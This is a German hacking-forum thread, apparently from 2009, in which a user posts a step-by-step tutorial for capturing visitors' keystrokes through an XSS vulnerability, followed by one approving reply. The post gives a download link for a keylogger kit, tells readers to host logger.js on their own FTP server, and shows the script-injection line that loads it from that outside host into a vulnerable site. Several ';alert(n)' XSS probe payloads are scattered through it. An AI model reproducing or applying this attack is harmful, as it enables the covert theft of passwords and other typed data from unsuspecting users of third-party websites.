Ergebnis 1 bis 2 von 2
  1. #1
    bit creepy!? Avatar von trisn
    Registriert seit
    01.01.2009
    Beiträge
    894

    Standard .txt [XSS] JavaScript Keylogger

    XSS Keylogger
    written by trisn

    So , heute zeige ich euch wie ihr Tastenanschläge bei einer XSS Vulnerability speichert. [Keylogger]


    ';alert(1)


    Zuerst benötigen wir die Entsprechenden Daten


    http://www.load.to/WYRuLWPWgc/XSS_Keylogger_Daten.rar


    ';alert(2)



    Nun ändern wir die Daten in der logger.js auf unseren FTP Server
    Die Zeilen die zu ändern sind , sind leicht zu finden.


    ';alert(3)


    Nun laden wir den ganzen Krempel hoch , auf einen FTP Server
    der JavaCode ausführt , probiert es mal mit funpic oder so könnt klappen.
    Packt die Sachen alle in einen Ordner und gebt den /path an den ihr auch in logger.js eingegeben habt.


    ';alert(4)


    Nun brauchen wir noch eine Seite wo wir JavaScript ausführen können,
    dies können wir über <iframe src=http://free-hack.com zB testen
    da wir bei der Anwendung des Loggers auch mir script src= arbeiten.


    ';alert(5)


    So , nun fügen wir das ganze spektakel mit

    <script src=http://deinftp.ws/logger.js</script>

    and der XSS Vulnerable aus und wir sehen ein Text Dokument
    auf unserem FTP Server wo die Tastenanschläge gespeichert werden.



    ####################

    Danke , dass wars und so einfach ist es

    #########

    Wenn die Keystrokes noch nicht bestimmt wurden müsst ihr dies noch schnell tun ^^

    ####################

    Next Tutorial ; XSS Router Hijacking oder Datenbank Schwächen ausnutzen


    ####

    Visit acceptthefuture.wordpress.com
    (Bald wieder aktiv)

    ';alert(trisn)


    Geändert von enco (09.08.2009 um 19:05 Uhr) Grund: Grauenhaft fabrlich gestaltet und formatiert.
    __ __
    \/----\/
    \0 0/
    _\ /_
    _| \/ |_
    | | | | | |
    _| | | | | |_
    "---|_|--|_|---"


    määäähh.

  2. #2
    Trojaner
    Registriert seit
    11.07.2009
    Beiträge
    65

    Standard

    hey coole idee - ich hoffe ich lese noch mehr von deinen tuts

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •